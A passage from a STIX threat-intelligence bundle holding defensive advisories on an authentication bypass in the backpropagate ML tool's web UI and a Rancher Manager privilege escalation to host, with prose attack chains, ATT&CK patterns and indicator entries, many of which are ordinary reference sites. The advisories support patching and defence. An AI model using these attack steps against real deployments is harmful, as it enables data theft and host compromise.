      "id": "relationship--94c4c152-5d7b-5d62-b119-db7e1c80be57",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fc54fc3-16cb-5157-a078-3587db30a6de",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9fc54fc3-16cb-5157-a078-3587db30a6de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unauthenticated Access to backpropagate UI via Authentication Bypass (CVE-2026-48797)",
      "description": "## Overview\n\nA critical authentication bypass vulnerability, tracked as CVE-2026-48797, exists in the `backpropagate` machine learning operations tool (versions \u003e= 1.1.0 and \u003c 1.2.0), specifically affecting its optional Reflex web UI. Despite documented command-line flags `--auth user:pass` and `--share` intended to enforce HTTP Basic authentication and control public exposure, the Reflex backend fails to implement any authentication middleware. This oversight means any attacker able to reach the UI's bound port, whether locally or remotely, gains full administrative control without credentials. This flaw enables attackers to read sensitive uploaded datasets, initiate arbitrary model training, push tampered models to HuggingFace Hub accounts, and trigger denial-of-service through uncontrolled file uploads, posing significant data exfiltration and supply-chain compromise risks. The vulnerability was discovered by an internal audit on May 22, 2026, and patched in version 1.2.0.\n\n## Attack Chain\n\n1.  **Reconnaissance \u0026 Initial Access**: An attacker identifies a running `backpropagate` Reflex UI instance (version \u003e= 1.1.0, \u003c 1.2.0) bound to a network accessible port. This may be `localhost` (default) or a public address if the legitimate operator used the `--share` flag.\n2.  **Authentication Bypass**: The attacker accesses the UI's HTTP endpoint without providing any credentials, as the documented `--auth` flag does not enforce authentication.\n3.  **Information Disclosure**: The attacker navigates the UI to view uploaded datasets (e.g., JSONL/CSV/TXT files) and extracts sensitive information used for fine-tuning.\n4.  **Discovery**: The attacker can read `source_model_path`, `dataset_path`, `model`, and `uploaded_path` values from the UI, bypassing `safe_path()` helpers and potentially revealing internal file system structure.\n5.  **Arbitrary Execution**: The attacker triggers arbitrary training runs against any locally installed base model or models downloadable from HuggingFace, potentially leading to remote code execution or resource exhaustion.\n6.  **Supply Chain Compromise**: The attacker initiates HuggingFace Hub pushes to repositories specified via the UI, potentially pushing malicious or tampered model weights to the operator's account.\n7.  **Denial of Service**: The attacker exploits the `rx.upload` endpoint, which lacks size, extension, or count caps, to upload large files and exhaust disk space, causing a denial of service.\n\n## Impact\n\nThis critical vulnerability enables a range of severe consequences. Attackers can exfiltrate sensitive uploaded datasets, such as proprietary training data, client information, or other confidential records. They can also initiate arbitrary model training, potentially leading to resource abuse or arbitrary code execution within the victim's environment. The ability to trigger HuggingFace Hub pushes poses a significant supply-chain risk, allowing attackers to inject malicious or tampered models into the victim's publicly hosted repositories. Furthermore, uncontrolled file uploads via the `rx.upload` endpoint can lead to disk-fill denial-of-service attacks, disrupting critical ML operations. The impact extends to all users running vulnerable versions of `backpropagate` who either expose the UI publicly or have local attackers.\n\n## Recommendation\n\n*   Immediately upgrade `backpropagate` to version 1.2.0 or higher by running `pip install --upgrade backpropagate` to patch CVE-2026-48797.\n*   If immediate upgrade is not possible, do NOT use the `--auth` or `--share` flags with `backprop ui` as they are ineffective.\n*   For remote access, use SSH port-forwarding (as described in the brief) to secure access to the `backpropagate` UI, leveraging SSH's authentication mechanisms.\n*   Audit existing `backpropagate` deployments for any instances launched with `--share` prior to May 23, 2026, as these instances were openly accessible.\n*   Re-issue HuggingFace API tokens that were in use on systems running vulnerable `backpropagate` UI instances exposed with `--share` due to potential compromise of push targets.\n*   Review webserver access logs for the `backpropagate` UI for suspicious unauthenticated access to sensitive endpoints like `/rx.upload` or data preview pages if proxying the UI through a webserver.\n",
      "published": "2026-07-03T10:32:41Z",
      "labels": [
        "authentication-bypass",
        "critical-vulnerability",
        "supply-chain",
        "data-exfiltration",
        "denial-of-service",
        "web-ui",
        "machine-learning",
        "reflex"
      ],
      "object_refs": [
        "indicator--3a000c78-1b3e-5a96-b161-39d6e3b8a086",
        "indicator--417eeacd-413a-527c-8180-eef461e0b331",
        "indicator--1d86fdd8-a530-5da4-a090-2acff72d3257",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
        "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
        "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-f65r-h4g3-3h9h"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mcp-tool-shop-org/backpropagate/blob/main/CHANGELOG.md#120---2026-05-23"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b5d197a1-5e09-5c5e-b321-d8cc40acb0e6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--deae6e7a-d4eb-58ba-896f-accefc302961",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3b9eadfb-cda2-56c5-95f3-e9f47c4788ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Deploy Container",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1610",
          "url": "https://attack.mitre.org/techniques/T1610"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cb37ee5e-44a1-5379-a739-eee07a668fbd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--deae6e7a-d4eb-58ba-896f-accefc302961",
      "target_ref": "attack-pattern--3b9eadfb-cda2-56c5-95f3-e9f47c4788ee"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--59f348cb-9ef6-5341-9b2e-325eadda7b79",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Escape to Host",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1611",
          "url": "https://attack.mitre.org/techniques/T1611"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--67f4f686-9647-5f53-93f8-e037d0f8cfb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--deae6e7a-d4eb-58ba-896f-accefc302961",
      "target_ref": "attack-pattern--59f348cb-9ef6-5341-9b2e-325eadda7b79"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--deae6e7a-d4eb-58ba-896f-accefc302961",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Rancher Manager Privilege Escalation from Project Owner to Host (CVE-2026-41052)",
      "description": "## Overview\n\nA critical privilege escalation vulnerability, identified as CVE-2026-41052, has been disclosed in Rancher Manager, affecting versions prior to `v2.12.10`, `v2.13.6`, and `v2.14.2`. This flaw allows users assigned the Project Owner role to maliciously modify Pod Security Admission (PSA) labels on namespaces they control. By doing so, an attacker can configure a namespace to utilize the 'privileged' PSA profile, effectively disabling core Kubernetes security protections. This enables the deployment of highly privileged workloads that can bypass standard container isolation boundaries. Exploitation of this vulnerability can lead to direct access to host-level resources, container breakout, and ultimately, cluster-wide privilege escalation, compromising affected nodes and their running workloads. Defenders need to prioritize patching or applying the specified workarounds to prevent this severe access vector.\n\n## Attack Chain\n\n1.  A legitimate user is granted \"Cluster Member\" access within Rancher Manager, providing them with initial access to the cluster environment.\n2.  The user either creates a new project or is assigned ownership of an existing project, thereby receiving the \"Project Owner\" role.\n3.  Leveraging their Project Owner role, the user creates a new namespace within their assigned project.\n4.  Due to the vulnerability (CVE-2026-41052), the Project Owner modifies the Pod Security Admission (PSA) configuration for their newly created namespace.\n5.  The attacker specifically sets the namespace's PSA profile to \"privileged,\" which removes crucial security restrictions.\n6.  Within this privileged namespace, the attacker deploys a containerized workload (e.g., a Kubernetes Pod) configured with elevated capabilities, such as `privileged: true` or host path mounts.\n7.  This privileged workload bypasses standard container isolation boundaries, gaining direct access to the underlying host's resources and filesystem.\n8.  From the compromised host, the attacker can achieve broader cluster privilege escalation, potentially affecting other nodes and control plane components.\n\n## Impact\n\nExploitation of CVE-2026-41052 in Rancher Manager allows a malicious Project Owner to escalate privileges significantly within the Kubernetes cluster. The primary consequences include the deployment of privileged containers, which then grant access to host-level resources of the underlying nodes. This can lead to container breakout scenarios, bypassing typical isolation mechanisms and potentially compromising the host operating system. The ultimate result is cluster privilege escalation, where the attacker gains control over critical cluster components and data, compromising all workloads running on affected nodes and potentially the entire cluster's integrity and confidentiality.\n\n## Recommendation\n\n*   Patch CVE-2026-41052 immediately by upgrading Rancher Manager to `v2.12.10`, `v2.13.6`, `v2.14.2`, or newer.\n*   If immediate patching is not possible, implement the recommended workaround: create a custom project role based on the existing Project Owner role, but explicitly restrict the allowed verbs for projects to only “`get`, `update`, `delete`, `patch`, `create`, `list`, `watch`, `deletecollection`” instead of the wildcard “`*`”. This prevents access to the `updatepsa` capability.\n",
      "published": "2026-07-03T10:31:28Z",
      "labels": [
        "privilege-escalation",
        "container",
        "kubernetes",
        "cloud"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--3b9eadfb-cda2-56c5-95f3-e9f47c4788ee",
        "attack-pattern--59f348cb-9ef6-5341-9b2e-325eadda7b79"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-vx8h-4prv-g744"
        },
        {
          "source_name": "reference",
          "url": "https://kubernetes.io/docs/concepts/security/pod-security-standards/"
        }
      ],
      "confidence": 95
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--99eaa171-a48d-5425-b11c-344aabf5d45c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/",
      "pattern": "[url:value = 'https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4ccbb120-c57f-5c79-bcb7-a1036ba0b518",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--99eaa171-a48d-5425-b11c-344aabf5d45c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b5b6e70d-6f9a-5379-9f4a-a87c1cbc8bfc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html",
      "pattern": "[url:value = 'https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1fcdb312-5159-525a-bf15-ff2e4ac47d37",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--b5b6e70d-6f9a-5379-9f4a-a87c1cbc8bfc"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9497002e-6169-58bc-acbe-1a9b8eedea58",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://app.any.run/tasks/cf1245de-06a7-4366-8209-8e3006f2bfe5/",
      "pattern": "[url:value = 'https://app.any.run/tasks/cf1245de-06a7-4366-8209-8e3006f2bfe5/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f0003505-7b84-59e4-ac4f-69240958d033",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--9497002e-6169-58bc-acbe-1a9b8eedea58"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ade583a7-d0b6-5e42-b002-ea0a0f9d4ab5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/",
      "pattern": "[url:value = 'https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dd9206df-63f7-5251-9ab5-97f5c3208c18",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--ade583a7-d0b6-5e42-b002-ea0a0f9d4ab5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a1469590-9a8c-544a-9933-d46973047233",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1059.001/import_applocker_policy/windows-powershell-xml2.log",
      "pattern": "[url:value = 'https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1059.001/import_applocker_policy/windows-powershell-xml2.log']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--22bc5e47-e3ef-54de-b4b6-42ef354e7104",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--a1469590-9a8c-544a-9933-d46973047233"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bda38f91-cb5e-56bf-ab75-d73ac0dfb1cc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://devblogs.microsoft.com/scripting/automating-quser-through-powershell/",
      "pattern": "[url:value = 'https://devblogs.microsoft.com/scripting/automating-quser-through-powershell/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9b95de0b-6313-5e71-86c3-3e89a52cb71a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--bda38f91-cb5e-56bf-ab75-d73ac0dfb1cc"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3854d65d-8e73-5c6d-bd55-8c73dd0ae4ff",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1531/log_off_user/pwh_quser_logoff.log",
      "pattern": "[url:value = 'https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1531/log_off_user/pwh_quser_logoff.log']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bc315f3e-83ad-5ff5-b425-a1435599b1b2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--3854d65d-8e73-5c6d-bd55-8c73dd0ae4ff"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2ad8d572-d47d-5633-88fd-8be3d9c40395",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://sploitus.com/exploit?id=816BFD0D-57FA-5C9C-B54C-3F0F88BD2C84",
      "pattern": "[url:value = 'https://sploitus.com/exploit?id=816BFD0D-57FA-5C9C-B54C-3F0F88BD2C84']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0cb19009-4641-55e9-b545-8aaf4a1bf178",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--2ad8d572-d47d-5633-88fd-8be3d9c40395"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--26c5c80d-6bfe-5b20-80f9-11431f5f6cc5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: sharepoint.local",
      "pattern": "[domain-name:value = 'sharepoint.local']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--abdfb5e7-dffd-52fe-a04a-cd0857199396",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--26c5c80d-6bfe-5b20-80f9-11431f5f6cc5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--508c9b85-b0f7-5a40-b327-9196b1d99043",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://127.0.0.1:8080",
      "pattern": "[url:value = 'http://127.0.0.1:8080']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b18c89a7-1c5e-5fe6-b5f2-02a241d3c503",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--508c9b85-b0f7-5a40-b327-9196b1d99043"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0df8a8ba-a579-5ad8-9027-e1ab1759716d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: graph.windows.net",
      "pattern": "[domain-name:value = 'graph.windows.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--200abdef-5a31-56ef-8f1c-41f95f8cbb4c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--0df8a8ba-a579-5ad8-9027-e1ab1759716d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--53b08a03-5197-5d35-a9ce-515971533604",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/andreisss/Ghosting-AMSI",
      "pattern": "[url:value = 'https://github.com/andreisss/Ghosting-AMSI']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--98bb930d-206a-5210-a778-13331c1c5fbf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--53b08a03-5197-5d35-a9ce-515971533604"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--51b2eab1-fe66-5c8c-aefe-db3a4dd1fd30",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: nvd.nist.gov",
      "pattern": "[domain-name:value = 'nvd.nist.gov']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fc7ae724-97e9-5323-864c-84d95f1a3a98",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--51b2eab1-fe66-5c8c-aefe-db3a4dd1fd30"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--531f6dd3-2d74-57d0-949a-1d1da9e8ec66",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: msrc.microsoft.com",
      "pattern": "[domain-name:value = 'msrc.microsoft.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--54b8eabd-743c-5dfe-87e3-ed1873ecde6d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--531f6dd3-2d74-57d0-949a-1d1da9e8ec66"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5edcdd9f-155e-50a0-bf86-5a1f32b8a272",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57983",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57983']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a259523a-12b8-539d-a5e5-2ef61dc0c55d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--5edcdd9f-155e-50a0-bf86-5a1f32b8a272"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--22a47b60-8865-535a-8f14-e915a8128bb1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "email: nvd@nist.gov",
      "pattern": "[email-addr:value = 'nvd@nist.gov']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a2984fad-789c-5ade-8809-4ce4387f053f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--22a47b60-8865-535a-8f14-e915a8128bb1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--35126508-6497-5438-aaa9-833e8c34a868",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "email: soc@us-cert.gov",
      "pattern": "[email-addr:value = 'soc@us-cert.gov']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9cbb3f3b-ddd8-5a86-bbf8-580edd7d57ae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--35126508-6497-5438-aaa9-833e8c34a868"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e682bb6c-4c89-5049-8fc4-4927cb35c8f4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58288",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58288']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ad0bf294-fb90-52a8-934d-d16ec4461fd4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--e682bb6c-4c89-5049-8fc4-4927cb35c8f4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--59499f6c-9e51-5ba8-a11b-9abaa8e90a43",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://nvd.nist.gov",
      "pattern": "[url:value = 'https://nvd.nist.gov']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e1ea0464-2be7-570e-834e-0b8f67074897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--59499f6c-9e51-5ba8-a11b-9abaa8e90a43"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cc422e5b-e03b-509b-8f23-1b671f9e4290",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58292",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58292']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4a1322c0-ea3d-54e2-a797-0b9668aa9962",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--cc422e5b-e03b-509b-8f23-1b671f9e4290"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--94875413-4d87-592e-b755-5bab0a304c12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: nist.gov",
      "pattern": "[domain-name:value = 'nist.gov']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b547c40d-6a09-512a-82f9-b6cde4d984e4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--94875413-4d87-592e-b755-5bab0a304c12"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--439f0e02-4eb9-5ccd-91ef-236e6500886e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: microsoft.com",
      "pattern": "[domain-name:value = 'microsoft.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--71250996-52cd-5b93-8206-eb8d315e6f4f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--439f0e02-4eb9-5ccd-91ef-236e6500886e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--35346df7-cd8b-58b3-9bff-e0bdce78deb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58297",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58297']",
      "pattern_type": "stix",
